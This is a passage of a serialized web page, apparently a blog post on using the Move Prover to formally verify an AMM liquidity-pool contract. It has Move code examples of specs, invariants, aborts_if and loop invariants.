u256",{"type":24,"tag":301,"props":14687,"children":14688},{"style":385},[14689],{"type":30,"value":10308},{"type":24,"tag":301,"props":14691,"children":14692},{"style":314},[14693],{"type":30,"value":14694},"compare",{"type":24,"tag":301,"props":14696,"children":14697},{"style":359},[14698],{"type":30,"value":362},{"type":24,"tag":301,"props":14700,"children":14701},{"style":385},[14702],{"type":30,"value":556},{"type":24,"tag":301,"props":14704,"children":14705},{"style":369},[14706],{"type":30,"value":14707},"lp_value_after_swap_and_fee",{"type":24,"tag":301,"props":14709,"children":14710},{"style":359},[14711],{"type":30,"value":377},{"type":24,"tag":301,"props":14713,"children":14714},{"style":385},[14715],{"type":30,"value":556},{"type":24,"tag":301,"props":14717,"children":14718},{"style":369},[14719],{"type":30,"value":14720},"lp_value_before_swap_u256",{"type":24,"tag":301,"props":14722,"children":14723},{"style":359},[14724],{"type":30,"value":589},{"type":24,"tag":301,"props":14726,"children":14727},{"class":303,"line":320},[14728,14733,14737,14742,14746,14750],{"type":24,"tag":301,"props":14729,"children":14730},{"style":314},[14731],{"type":30,"value":14732}," assert!",{"type":24,"tag":301,"props":14734,"children":14735},{"style":359},[14736],{"type":30,"value":362},{"type":24,"tag":301,"props":14738,"children":14739},{"style":369},[14740],{"type":30,"value":14741},"cmp",{"type":24,"tag":301,"props":14743,"children":14744},{"style":385},[14745],{"type":30,"value":2460},{"type":24,"tag":301,"props":14747,"children":14748},{"style":466},[14749],{"type":30,"value":469},{"type":24,"tag":301,"props":14751,"children":14752},{"style":359},[14753],{"type":30,"value":14754},", ERR_INCORRECT_SWAP);\n",{"type":24,"tag":32,"props":14756,"children":14757},{},[14758,14760,14765],{"type":30,"value":14759},"The move prover really shines when we're proving relationships ",{"type":24,"tag":5422,"props":14761,"children":14762},{},[14763],{"type":30,"value":14764},"between",{"type":30,"value":14766}," functions.",{"type":24,"tag":32,"props":14768,"children":14769},{},[14770,14772,14778],{"type":30,"value":14771},"One example of a more complicated relationship that can't be proved easily via assertions would be the ",{"type":24,"tag":145,"props":14773,"children":14775},{"className":14774},[],[14776],{"type":30,"value":14777},"no_free_money_theorem",{"type":30,"value":14779}," in the move repository.",{"type":24,"tag":291,"props":14781,"children":14783},{"className":9818,"code":14782,"language":9817,"meta":7,"style":7}," // #[test] // TODO: cannot specify the test-only functions\n fun no_free_money_theorem(coin1_in: u64, coin2_in: u64): (u64, u64) acquires Pool {\n let share = add_liquidity(coin1_in, coin2_in);\n remove_liquidity(share)\n }\n spec no_free_money_theorem {\n pragma verify=false;\n ensures result_1 \u003C= coin1_in;\n ensures result_2 \u003C= coin2_in;\n }\n",[14784],{"type":24,"tag":145,"props":14785,"children":14786},{"__ignoreMap":7},[14787,14795,14883,14925,14946,14953,14969,14995,15022,15047],{"type":24,"tag":301,"props":14788,"children":14789},{"class":303,"line":304},[14790],{"type":24,"tag":301,"props":14791,"children":14792},{"style":1062},[14793],{"type":30,"value":14794}," // #[test] // TODO: cannot specify the test-only functions\n",{"type":24,"tag":301,"props":14796,"children":14797},{"class":303,"line":320},[14798,14802,14807,14811,14816,14820,14824,14828,14833,14837,14841,14845,14849,14853,14858,14862,14866,14870,14874,14879],{"type":24,"tag":301,"props":14799,"children":14800},{"style":369},[14801],{"type":30,"value":13388},{"type":24,"tag":301,"props":14803,"children":14804},{"style":314},[14805],{"type":30,"value":14806}," no_free_money_theorem",{"type":24,"tag":301,"props":14808,"children":14809},{"style":359},[14810],{"type":30,"value":362},{"type":24,"tag":301,"props":14812,"children":14813},{"style":369},[14814],{"type":30,"value":14815},"coin1_in",{"type":24,"tag":301,"props":14817,"children":14818},{"style":385},[14819],{"type":30,"value":1679},{"type":24,"tag":301,"props":14821,"children":14822},{"style":10246},[14823],{"type":30,"value":12680},{"type":24,"tag":301,"props":14825,"children":14826},{"style":359},[14827],{"type":30,"value":377},{"type":24,"tag":301,"props":14829,"children":14830},{"style":369},[14831],{"type":30,"value":14832},"coin2_in",{"type":24,"tag":301,"props":14834,"children":14835},{"style":385},[14836],{"type":30,"value":1679},{"type":24,"tag":301,"props":14838,"children":14839},{"style":10246},[14840],{"type":30,"value":12680},{"type":24,"tag":301,"props":14842,"children":14843},{"style":359},[14844],{"type":30,"value":9961},{"type":24,"tag":301,"props":14846,"children":14847},{"style":385},[14848],{"type":30,"value":1679},{"type":24,"tag":301,"props":14850,"children":14851},{"style":359},[14852],{"type":30,"value":873},{"type":24,"tag":301,"props":14854,"children":14855},{"style":10246},[14856],{"type":30,"value":14857},"u64",{"type":24,"tag":301,"props":14859,"children":14860},{"style":359},[14861],{"type":30,"value":377},{"type":24,"tag":301,"props":14863,"children":14864},{"style":10246},[14865],{"type":30,"value":14857},{"type":24,"tag":301,"props":14867,"children":14868},{"style":359},[14869],{"type":30,"value":911},{"type":24,"tag":301,"props":14871,"children":14872},{"style":369},[14873],{"type":30,"value":13163},{"type":24,"tag":301,"props":14875,"children":14876},{"style":10246},[14877],{"type":30,"value":14878}," Pool",{"type":24,"tag":301,"props":14880,"children":14881},{"style":359},[14882],{"type":30,"value":3035},{"type":24,"tag":301,"props":14884,"children":14885},{"class":303,"line":335},[14886,14891,14896,14900,14905,14909,14913,14917,14921],{"type":24,"tag":301,"props":14887,"children":14888},{"style":348},[14889],{"type":30,"value":14890}," let",{"type":24,"tag":301,"props":14892,"children":14893},{"style":369},[14894],{"type":30,"value":14895}," share",{"type":24,"tag":301,"props":14897,"children":14898},{"style":385},[14899],{"type":30,"value":2537},{"type":24,"tag":301,"props":14901,"children":14902},{"style":314},[14903],{"type":30,"value":14904}," add_liquidity",{"type":24,"tag":301,"props":14906,"children":14907},{"style":359},[14908],{"type":30,"value":362},{"type":24,"tag":301,"props":14910,"children":14911},{"style":369},[14912],{"type":30,"value":14815},{"type":24,"tag":301,"props":14914,"children":14915},{"style":359},[14916],{"type":30,"value":377},{"type":24,"tag":301,"props":14918,"children":14919},{"style":369},[14920],{"type":30,"value":14832},{"type":24,"tag":301,"props":14922,"children":14923},{"style":359},[14924],{"type":30,"value":589},{"type":24,"tag":301,"props":14926,"children":14927},{"class":303,"line":344},[14928,14933,14937,14942],{"type":24,"tag":301,"props":14929,"children":14930},{"style":314},[14931],{"type":30,"value":14932}," remove_liquidity",{"type":24,"tag":301,"props":14934,"children":14935},{"style":359},[14936],{"type":30,"value":362},{"type":24,"tag":301,"props":14938,"children":14939},{"style":369},[14940],{"type":30,"value":14941},"share",{"type":24,"tag":301,"props":14943,"children":14944},{"style":359},[14945],{"type":30,"value":791},{"type":24,"tag":301,"props":14947,"children":14948},{"class":303,"line":401},[14949],{"type":24,"tag":301,"props":14950,"children":14951},{"style":359},[14952],{"type":30,"value":6918},{"type":24,"tag":301,"props":14954,"children":14955},{"class":303,"line":415},[14956,14961,14965],{"type":24,"tag":301,"props":14957,"children":14958},{"style":369},[14959],{"type":30,"value":14960}," spec",{"type":24,"tag":301,"props":14962,"children":14963},{"style":369},[14964],{"type":30,"value":14806},{"type":24,"tag":301,"props":14966,"children":14967},{"style":359},[14968],{"type":30,"value":3035},{"type":24,"tag":301,"props":14970,"children":14971},{"class":303,"line":439},[14972,14977,14982,14986,14991],{"type":24,"tag":301,"props":14973,"children":14974},{"style":369},[14975],{"type":30,"value":14976}," pragma",{"type":24,"tag":301,"props":14978,"children":14979},{"style":369},[14980],{"type":30,"value":14981}," verify",{"type":24,"tag":301,"props":14983,"children":14984},{"style":385},[14985],{"type":30,"value":523},{"type":24,"tag":301,"props":14987,"children":14988},{"style":348},[14989],{"type":30,"value":14990},"false",{"type":24,"tag":301,"props":14992,"children":14993},{"style":359},[14994],{"type":30,"value":492},{"type":24,"tag":301,"props":14996,"children":14997},{"class":303,"line":447},[14998,15003,15008,15013,15018],{"type":24,"tag":301,"props":14999,"children":15000},{"style":369},[15001],{"type":30,"value":15002}," ensures",{"type":24,"tag":301,"props":15004,"children":15005},{"style":369},[15006],{"type":30,"value":15007}," result_1",{"type":24,"tag":301,"props":15009,"children":15010},{"style":385},[15011],{"type":30,"value":15012}," \u003C=",{"type":24,"tag":301,"props":15014,"children":15015},{"style":369},[15016],{"type":30,"value":15017}," coin1_in",{"type":24,"tag":301,"props":15019,"children":15020},{"style":359},[15021],{"type":30,"value":492},{"type":24,"tag":301,"props":15023,"children":15024},{"class":303,"line":476},[15025,15029,15034,15038,15043],{"type":24,"tag":301,"props":15026,"children":15027},{"style":369},[15028],{"type":30,"value":15002},{"type":24,"tag":301,"props":15030,"children":15031},{"style":369},[15032],{"type":30,"value":15033}," result_2",{"type":24,"tag":301,"props":15035,"children":15036},{"style":385},[15037],{"type":30,"value":15012},{"type":24,"tag":301,"props":15039,"children":15040},{"style":369},[15041],{"type":30,"value":15042}," coin2_in",{"type":24,"tag":301,"props":15044,"children":15045},{"style":359},[15046],{"type":30,"value":492},{"type":24,"tag":301,"props":15048,"children":15049},{"class":303,"line":495},[15050],{"type":24,"tag":301,"props":15051,"children":15052},{"style":359},[15053],{"type":30,"value":6918},{"type":24,"tag":32,"props":15055,"children":15056},{},[15057],{"type":30,"value":15058},"There's no clean way to express this with an assert because this makes an observation across two functions which are temporally separated.",{"type":24,"tag":32,"props":15060,"children":15061},{},[15062,15064,15069],{"type":30,"value":15063},"Invariant's are also extremely useful. For example, enforcing invariants about fee parameters (fee can never be greater than 100%) or pool supply makes it a ",{"type":24,"tag":5422,"props":15065,"children":15066},{},[15067],{"type":30,"value":15068},"lot",{"type":30,"value":15070}," easier to reason about the protocol.",{"type":24,"tag":32,"props":15072,"children":15073},{},[15074],{"type":30,"value":15075},"For example, Ian uses invariants to clearly define core properties of his AMM state.",{"type":24,"tag":291,"props":15077,"children":15079},{"className":9818,"code":15078,"language":9817,"meta":7,"style":7},"spec PoolState {\n invariant supply >= MINIMUM_LIQUIDITY;\n}\n",[15080],{"type":24,"tag":145,"props":15081,"children":15082},{"__ignoreMap":7},[15083,15100,15122],{"type":24,"tag":301,"props":15084,"children":15085},{"class":303,"line":304},[15086,15091,15096],{"type":24,"tag":301,"props":15087,"children":15088},{"style":369},[15089],{"type":30,"value":15090},"spec",{"type":24,"tag":301,"props":15092,"children":15093},{"style":10246},[15094],{"type":30,"value":15095}," PoolState",{"type":24,"tag":301,"props":15097,"children":15098},{"style":359},[15099],{"type":30,"value":3035},{"type":24,"tag":301,"props":15101,"children":15102},{"class":303,"line":320},[15103,15108,15113,15117],{"type":24,"tag":301,"props":15104,"children":15105},{"style":369},[15106],{"type":30,"value":15107}," invariant",{"type":24,"tag":301,"props":15109,"children":15110},{"style":369},[15111],{"type":30,"value":15112}," supply",{"type":24,"tag":301,"props":15114,"children":15115},{"style":385},[15116],{"type":30,"value":892},{"type":24,"tag":301,"props":15118,"children":15119},{"style":359},[15120],{"type":30,"value":15121}," MINIMUM_LIQUIDITY;\n",{"type":24,"tag":301,"props":15123,"children":15124},{"class":303,"line":335},[15125],{"type":24,"tag":301,"props":15126,"children":15127},{"style":359},[15128],{"type":30,"value":698},{"type":24,"tag":32,"props":15130,"children":15131},{},[15132,15134,15140,15142,15148],{"type":30,"value":15133},"Another useful pattern for the Move prover is ",{"type":24,"tag":145,"props":15135,"children":15137},{"className":15136},[],[15138],{"type":30,"value":15139},"aborts_if",{"type":30,"value":15141},". More specifically, it can be very helpful to assert that a function never aborts, with ",{"type":24,"tag":145,"props":15143,"children":15145},{"className":15144},[],[15146],{"type":30,"value":15147},"aborts_if false",{"type":30,"value":206},{"type":24,"tag":32,"props":15150,"children":15151},{},[15152],{"type":30,"value":15153},"Although loop invariants are a bit clunky, Ian is also able to prove that a relatively nontrivial function doesn't abort.",{"type":24,"tag":291,"props":15155,"children":15157},{"className":9818,"code":15156,"language":9817,"meta":7,"style":7}," fun multiply_vec_by_n_coins(input: vector\u003Cu64>): vector\u003Cu128> {\n let amounts_times_coins = vector::empty\u003Cu128>();\n let i = 0;\n let n_coins = vector::length(&input);\n while ({\n spec {\n invariant len(amounts_times_coins) == i;\n invariant i \u003C= n_coins;\n invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n };\n (i \u003C n_coins)\n }) {\n vector::push_back(\n &mut amounts_times_coins,\n (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n );\n i = i + 1;\n };\n spec {\n assert i == n_coins;\n assert len(input) == n_coins;\n };\n amounts_times_coins\n }\n spec multiply_vec_by_n_coins {\n pragma opaque;\n aborts_if false;\n ensures len(result) == len(input);\n ensures forall j in 0..len(input): result[j] == input[j] * len(input);\n }\n",[15158],{"type":24,"tag":145,"props":15159,"children":15160},{"__ignoreMap":7},[15161,15225,15267,15290,15335,15348,15360,15398,15421,15508,15516,15540,15548,15569,15589,15689,15697,15725,15733,15745,15769,15804,15811,15819,15826,15841,15857,15873,15916,16020],{"type":24,"tag":301,"props":15162,"children":15163},{"class":303,"line":304},[15164,15168,15173,15177,15182,15186,15191,15195,15199,15204,15208,15212,15216,15221],{"type":24,"tag":301,"props":15165,"children":15166},{"style":369},[15167],{"type":30,"value":13388},{"type":24,"tag":301,"props":15169,"children":15170},{"style":314},[15171],{"type":30,"value":15172}," multiply_vec_by_n_coins",{"type":24,"tag":301,"props":15174,"children":15175},{"style":359},[15176],{"type":30,"value":362},{"type":24,"tag":301,"props":15178,"children":15179},{"style":369},[15180],{"type":30,"value":15181},"input",{"type":24,"tag":301,"props":15183,"children":15184},{"style":385},[15185],{"type":30,"value":1679},{"type":24,"tag":301,"props":15187,"children":15188},{"style":369},[15189],{"type":30,"value":15190}," vector",{"type":24,"tag":301,"props":15192,"children":15193},{"style":359},[15194],{"type":30,"value":1849},{"type":24,"tag":301,"props":15196,"children":15197},{"style":10246},[15198],{"type":30,"value":14857},{"type":24,"tag":301,"props":15200,"children":15201},{"style":359},[15202],{"type":30,"value":15203},">)",{"type":24,"tag":301,"props":15205,"children":15206},{"style":385},[15207],{"type":30,"value":1679},{"type":24,"tag":301,"props":15209,"children":15210},{"style":369},[15211],{"type":30,"value":15190},{"type":24,"tag":301,"props":15213,"children":15214},{"style":359},[15215],{"type":30,"value":1849},{"type":24,"tag":301,"props":15217,"children":15218},{"style":10246},[15219],{"type":30,"value":15220},"u128",{"type":24,"tag":301,"props":15222,"children":15223},{"style":359},[15224],{"type":30,"value":14097},{"type":24,"tag":301,"props":15226,"children":15227},{"class":303,"line":320},[15228,15232,15237,15241,15245,15249,15254,15258,15262],{"type":24,"tag":301,"props":15229,"children":15230},{"style":348},[15231],{"type":30,"value":14890},{"type":24,"tag":301,"props":15233,"children":15234},{"style":369},[15235],{"type":30,"value":15236}," amounts_times_coins",{"type":24,"tag":301,"props":15238,"children":15239},{"style":385},[15240],{"type":30,"value":2537},{"type":24,"tag":301,"props":15242,"children":15243},{"style":359},[15244],{"type":30,"value":15190},{"type":24,"tag":301,"props":15246,"children":15247},{"style":385},[15248],{"type":30,"value":10308},{"type":24,"tag":301,"props":15250,"children":15251},{"style":369},[15252],{"type":30,"value":15253},"empty",{"type":24,"tag":301,"props":15255,"children":15256},{"style":359},[15257],{"type":30,"value":1849},{"type":24,"tag":301,"props":15259,"children":15260},{"style":10246},[15261],{"type":30,"value":15220},{"type":24,"tag":301,"props":15263,"children":15264},{"style":359},[15265],{"type":30,"value":15266},">();\n",{"type":24,"tag":301,"props":15268,"children":15269},{"class":303,"line":335},[15270,15274,15278,15282,15286],{"type":24,"tag":301,"props":15271,"children":15272},{"style":348},[15273],{"type":30,"value":14890},{"type":24,"tag":301,"props":15275,"children":15276},{"style":369},[15277],{"type":30,"value":10225},{"type":24,"tag":301,"props":15279,"children":15280},{"style":385},[15281],{"type":30,"value":2537},{"type":24,"tag":301,"props":15283,"children":15284},{"style":466},[15285],{"type":30,"value":685},{"type":24,"tag":301,"props":15287,"children":15288},{"style":359},[15289],{"type":30,"value":492},{"type":24,"tag":301,"props":15291,"children":15292},{"class":303,"line":344},[15293,15297,15302,15306,15310,15314,15319,15323,15327,15331],{"type":24,"tag":301,"props":15294,"children":15295},{"style":348},[15296],{"type":30,"value":14890},{"type":24,"tag":301,"props":15298,"children":15299},{"style":369},[15300],{"type":30,"value":15301}," n_coins",{"type":24,"tag":301,"props":15303,"children":15304},{"style":385},[15305],{"type":30,"value":2537},{"type":24,"tag":301,"props":15307,"children":15308},{"style":359},[15309],{"type":30,"value":15190},{"type":24,"tag":301,"props":15311,"children":15312},{"style":385},[15313],{"type":30,"value":10308},{"type":24,"tag":301,"props":15315,"children":15316},{"style":314},[15317],{"type":30,"value":15318},"length",{"type":24,"tag":301,"props":15320,"children":15321},{"style":359},[15322],{"type":30,"value":362},{"type":24,"tag":301,"props":15324,"children":15325},{"style":385},[15326],{"type":30,"value":556},{"type":24,"tag":301,"props":15328,"children":15329},{"style":369},[15330],{"type":30,"value":15181},{"type":24,"tag":301,"props":15332,"children":15333},{"style":359},[15334],{"type":30,"value":589},{"type":24,"tag":301,"props":15336,"children":15337},{"class":303,"line":401},[15338,15343],{"type":24,"tag":301,"props":15339,"children":15340},{"style":308},[15341],{"type":30,"value":15342}," while",{"type":24,"tag":301,"props":15344,"children":15345},{"style":359},[15346],{"type":30,"value":15347}," ({\n",{"type":24,"tag":301,"props":15349,"children":15350},{"class":303,"line":415},[15351,15356],{"type":24,"tag":301,"props":15352,"children":15353},{"style":369},[15354],{"type":30,"value":15355}," spec",{"type":24,"tag":301,"props":15357,"children":15358},{"style":359},[15359],{"type":30,"value":3035},{"type":24,"tag":301,"props":15361,"children":15362},{"class":303,"line":439},[15363,15368,15373,15377,15382,15386,15390,15394],{"type":24,"tag":301,"props":15364,"children":15365},{"style":369},[15366],{"type":30,"value":15367}," invariant",{"type":24,"tag":301,"props":15369,"children":15370},{"style":314},[15371],{"type":30,"value":15372}," len",{"type":24,"tag":301,"props":15374,"children":15375},{"style":359},[15376],{"type":30,"value":362},{"type":24,"tag":301,"props":15378,"children":15379},{"style":369},[15380],{"type":30,"value":15381},"amounts_times_coins",{"type":24,"tag":301,"props":15383,"children":15384},{"style":359},[15385],{"type":30,"value":911},{"type":24,"tag":301,"props":15387,"children":15388},{"style":385},[15389],{"type":30,"value":607},{"type":24,"tag":301,"props":15391,"children":15392},{"style":369},[15393],{"type":30,"value":10225},{"type":24,"tag":301,"props":15395,"children":15396},{"style":359},[15397],{"type":30,"value":492},{"type":24,"tag":301,"props":15399,"children":15400},{"class":303,"line":447},[15401,15405,15409,15413,15417],{"type":24,"tag":301,"props":15402,"children":15403},{"style":369},[15404],{"type":30,"value":15367},{"type":24,"tag":301,"props":15406,"children":15407},{"style":369},[15408],{"type":30,"value":10225},{"type":24,"tag":301,"props":15410,"children":15411},{"style":385},[15412],{"type":30,"value":15012},{"type":24,"tag":301,"props":15414,"children":15415},{"style":369},[15416],{"type":30,"value":15301},{"type":24,"tag":301,"props":15418,"children":15419},{"style":359},[15420],{"type":30,"value":492},{"type":24,"tag":301,"props":15422,"children":15423},{"class":303,"line":476},[15424,15428,15433,15438,15442,15446,15450,15454,15458,15462,15466,15471,15475,15479,15484,15488,15492,15496,15500,15504],{"type":24,"tag":301,"props":15425,"children":15426},{"style":369},[15427],{"type":30,"value":15367},{"type":24,"tag":301,"props":15429,"children":15430},{"style":369},[15431],{"type":30,"value":15432}," forall",{"type":24,"tag":301,"props":15434,"children":15435},{"style":369},[15436],{"type":30,"value":15437}," j",{"type":24,"tag":301,"props":15439,"children":15440},{"style":348},[15441],{"type":30,"value":9878},{"type":24,"tag":301,"props":15443,"children":15444},{"style":466},[15445],{"type":30,"value":685},{"type":24,"tag":301,"props":15447,"children":15448},{"style":385},[15449],{"type":30,"value":9887},{"type":24,"tag":301,"props":15451,"children":15452},{"style":369},[15453],{"type":30,"value":10564},{"type":24,"tag":301,"props":15455,"children":15456},{"style":385},[15457],{"type":30,"value":1679},{"type":24,"tag":301,"props":15459,"children":15460},{"style":369},[15461],{"type":30,"value":15236},{"type":24,"tag":301,"props":15463,"children":15464},{"style":359},[15465],{"type":30,"value":541},{"type":24,"tag":301,"props":15467,"children":15468},{"style":369},[15469],{"type":30,"value":15470},"j",{"type":24,"tag":301,"props":15472,"children":15473},{"style":359},[15474],{"type":30,"value":1046},{"type":24,"tag":301,"props":15476,"children":15477},{"style":385},[15478],{"type":30,"value":607},{"type":24,"tag":301,"props":15480,"children":15481},{"style":369},[15482],{"type":30,"value":15483}," input",{"type":24,"tag":301,"props":15485,"children":15486},{"style":359},[15487],{"type":30,"value":541},{"type":24,"tag":301,"props":15489,"children":15490},{"style":369},[15491],{"type":30,"value":15470},{"type":24,"tag":301,"props":15493,"children":15494},{"style":359},[15495],{"type":30,"value":1046},{"type":24,"tag":301,"props":15497,"children":15498},{"style":385},[15499],{"type":30,"value":772},{"type":24,"tag":301,"props":15501,"children":15502},{"style":369},[15503],{"type":30,"value":15301},{"type":24,"tag":301,"props":15505,"children":15506},{"style":359},[15507],{"type":30,"value":492},{"type":24,"tag":301,"props":15509,"children":15510},{"class":303,"line":495},[15511],{"type":24,"tag":301,"props":15512,"children":15513},{"style":359},[15514],{"type":30,"value":15515}," };\n",{"type":24,"tag":301,"props":15517,"children":15518},{"class":303,"line":504},[15519,15524,15528,15532,15536],{"type":24,"tag":301,"props":15520,"children":15521},{"style":359},[15522],{"type":30,"value":15523}," (",{"type":24,"tag":301,"props":15525,"children":15526},{"style":369},[15527],{"type":30,"value":10564},{"type":24,"tag":301,"props":15529,"children":15530},{"style":385},[15531],{"type":30,"value":3950},{"type":24,"tag":301,"props":15533,"children":15534},{"style":369},[15535],{"type":30,"value":15301},{"type":24,"tag":301,"props":15537,"children":15538},{"style":359},[15539],{"type":30,"value":791},{"type":24,"tag":301,"props":15541,"children":15542},{"class":303,"line":512},[15543],{"type":24,"tag":301,"props":15544,"children":15545},{"style":359},[15546],{"type":30,"value":15547}," }) {\n",{"type":24,"tag":301,"props":15549,"children":15550},{"class":303,"line":592},[15551,15556,15560,15565],{"type":24,"tag":301,"props":15552,"children":15553},{"style":359},[15554],{"type":30,"value":15555}," vector",{"type":24,"tag":301,"props":15557,"children":15558},{"style":385},[15559],{"type":30,"value":10308},{"type":24,"tag":301,"props":15561,"children":15562},{"style":314},[15563],{"type":30,"value":15564},"push_back",{"type":24,"tag":301,"props":15566,"children":15567},{"style":359},[15568],{"type":30,"value":1707},{"type":24,"tag":301,"props":15570,"children":15571},{"class":303,"line":619},[15572,15577,15581,15585],{"type":24,"tag":301,"props":15573,"children":15574},{"style":385},[15575],{"type":30,"value":15576}," &",{"type":24,"tag":301,"props":15578,"children":15579},{"style":348},[15580],{"type":30,"value":10550},{"type":24,"tag":301,"props":15582,"children":15583},{"style":369},[15584],{"type":30,"value":15236},{"type":24,"tag":301,"props":15586,"children":15587},{"style":359},[15588],{"type":30,"value":1729},{"type":24,"tag":301,"props":15590,"children":15591},{"class":303,"line":635},[15592,15597,15601,15606,15610,15615,15619,15623,15627,15632,15636,15641,15645,15650,15655,15660,15664,15668,15672,15677,15681,15685],{"type":24,"tag":301,"props":15593,"children":15594},{"style":359},[15595],{"type":30,"value":15596}," (",{"type":24,"tag":301,"props":15598,"children":15599},{"style":385},[15600],{"type":30,"value":772},{"type":24,"tag":301,"props":15602,"children":15603},{"style":359},[15604],{"type":30,"value":15605},"vector",{"type":24,"tag":301,"props":15607,"children":15608},{"style":385},[15609],{"type":30,"value":10308},{"type":24,"tag":301,"props":15611,"children":15612},{"style":314},[15613],{"type":30,"value":15614},"borrow",{"type":24,"tag":301,"props":15616,"children":15617},{"style":359},[15618],{"type":30,"value":362},{"type":24,"tag":301,"props":15620,"children":15621},{"style":385},[15622],{"type":30,"value":556},{"type":24,"tag":301,"props":15624,"children":15625},{"style":369},[15626],{"type":30,"value":15181},{"type":24,"tag":301,"props":15628,"children":15629},{"style":359},[15630],{"type":30,"value":15631},", (",{"type":24,"tag":301,"props":15633,"children":15634},{"style":369},[15635],{"type":30,"value":10564},{"type":24,"tag":301,"props":15637,"children":15638},{"style":348},[15639],{"type":30,"value":15640}," as",{"type":24,"tag":301,"props":15642,"children":15643},{"style":10246},[15644],{"type":30,"value":12680},{"type":24,"tag":301,"props":15646,"children":15647},{"style":359},[15648],{"type":30,"value":15649},")) ",{"type":24,"tag":301,"props":15651,"children":15652},{"style":348},[15653],{"type":30,"value":15654},"as",{"type":24,"tag":301,"props":15656,"children":15657},{"style":10246},[15658],{"type":30,"value":15659}," u128",{"type":24,"tag":301,"props":15661,"children":15662},{"style":359},[15663],{"type":30,"value":911},{"type":24,"tag":301,"props":15665,"children":15666},{"style":385},[15667],{"type":30,"value":772},{"type":24,"tag":301,"props":15669,"children":15670},{"style":359},[15671],{"type":30,"value":873},{"type":24,"tag":301,"props":15673,"children":15674},{"style":369},[15675],{"type":30,"value":15676},"n_coins",{"type":24,"tag":301,"props":15678,"children":15679},{"style":348},[15680],{"type":30,"value":15640},{"type":24,"tag":301,"props":15682,"children":15683},{"style":10246},[15684],{"type":30,"value":15659},{"type":24,"tag":301,"props":15686,"children":15687},{"style":359},[15688],{"type":30,"value":791},{"type":24,"tag":301,"props":15690,"children":15691},{"class":303,"line":643},[15692],{"type":24,"tag":301,"props":15693,"children":15694},{"style":359},[15695],{"type":30,"value":15696}," );\n",{"type":24,"tag":301,"props":15698,"children":15699},{"class":303,"line":652},[15700,15705,15709,15713,15717,15721],{"type":24,"tag":301,"props":15701,"children":15702},{"style":369},[15703],{"type":30,"value":15704}," i",{"type":24,"tag":301,"props":15706,"children":15707},{"style":385},[15708],{"type":30,"value":2537},{"type":24,"tag":301,"props":15710,"children":15711},{"style":369},[15712],{"type":30,"value":10225},{"type":24,"tag":301,"props":15714,"children":15715},{"style":385},[15716],{"type":30,"value":957},{"type":24,"tag":301,"props":15718,"children":15719},{"style":466},[15720],{"type":30,"value":487},{"type":24,"tag":301,"props":15722,"children":15723},{"style":359},[15724],{"type":30,"value":492},{"type":24,"tag":301,"props":15726,"children":15727},{"class":303,"line":666},[15728],{"type":24,"tag":301,"props":15729,"children":15730},{"style":359},[15731],{"type":30,"value":15732}," };\n",{"type":24,"tag":301,"props":15734,"children":15735},{"class":303,"line":674},[15736,15741],{"type":24,"tag":301,"props":15737,"children":15738},{"style":369},[15739],{"type":30,"value":15740}," spec",{"type":24,"tag":301,"props":15742,"children":15743},{"style":359},[15744],{"type":30,"value":3035},{"type":24,"tag":301,"props":15746,"children":15747},{"class":303,"line":692},[15748,15753,15757,15761,15765],{"type":24,"tag":301,"props":15749,"children":15750},{"style":369},[15751],{"type":30,"value":15752}," assert",{"type":24,"tag":301,"props":15754,"children":15755},{"style":369},[15756],{"type":30,"value":10225},{"type":24,"tag":301,"props":15758,"children":15759},{"style":385},[15760],{"type":30,"value":2460},{"type":24,"tag":301,"props":15762,"children":15763},{"style":369},[15764],{"type":30,"value":15301},{"type":24,"tag":301,"props":15766,"children":15767},{"style":359},[15768],{"type":30,"value":492},{"type":24,"tag":301,"props":15770,"children":15771},{"class":303,"line":3631},[15772,15776,15780,15784,15788,15792,15796,15800],{"type":24,"tag":301,"props":15773,"children":15774},{"style":369},[15775],{"type":30,"value":15752},{"type":24,"tag":301,"props":15777,"children":15778},{"style":314},[15779],{"type":30,"value":15372},{"type":24,"tag":301,"props":15781,"children":15782},{"style":359},[15783],{"type":30,"value":362},{"type":24,"tag":301,"props":15785,"children":15786},{"style":369},[15787],{"type":30,"value":15181},{"type":24,"tag":301,"props":15789,"children":15790},{"style":359},[15791],{"type":30,"value":911},{"type":24,"tag":301,"props":15793,"children":15794},{"style":385},[15795],{"type":30,"value":607},{"type":24,"tag":301,"props":15797,"children":15798},{"style":369},[15799],{"type":30,"value":15301},{"type":24,"tag":301,"props":15801,"children":15802},{"style":359},[15803],{"type":30,"value":492},{"type":24,"tag":301,"props":15805,"children":15806},{"class":303,"line":3639},[15807],{"type":24,"tag":301,"props":15808,"children":15809},{"style":359},[15810],{"type":30,"value":15732},{"type":24,"tag":301,"props":15812,"children":15813},{"class":303,"line":3647},[15814],{"type":24,"tag":301,"props":15815,"children":15816},{"style":369},[15817],{"type":30,"value":15818}," amounts_times_coins\n",{"type":24,"tag":301,"props":15820,"children":15821},{"class":303,"line":3685},[15822],{"type":24,"tag":301,"props":15823,"children":15824},{"style":359},[15825],{"type":30,"value":6918},{"type":24,"tag":301,"props":15827,"children":15828},{"class":303,"line":3713},[15829,15833,15837],{"type":24,"tag":301,"props":15830,"children":15831},{"style":369},[15832],{"type":30,"value":14960},{"type":24,"tag":301,"props":15834,"children":15835},{"style":369},[15836],{"type":30,"value":15172},{"type":24,"tag":301,"props":15838,"children":15839},{"style":359},[15840],{"type":30,"value":3035},{"type":24,"tag":301,"props":15842,"children":15843},{"class":303,"line":3721},[15844,15848,15853],{"type":24,"tag":301,"props":15845,"children":15846},{"style":369},[15847],{"type":30,"value":14976},{"type":24,"tag":301,"props":15849,"children":15850},{"style":369},[15851],{"type":30,"value":15852}," opaque",{"type":24,"tag":301,"props":15854,"children":15855},{"style":359},[15856],{"type":30,"value":492},{"type":24,"tag":301,"props":15858,"children":15859},{"class":303,"line":3751},[15860,15865,15869],{"type":24,"tag":301,"props":15861,"children":15862},{"style":369},[15863],{"type":30,"value":15864}," 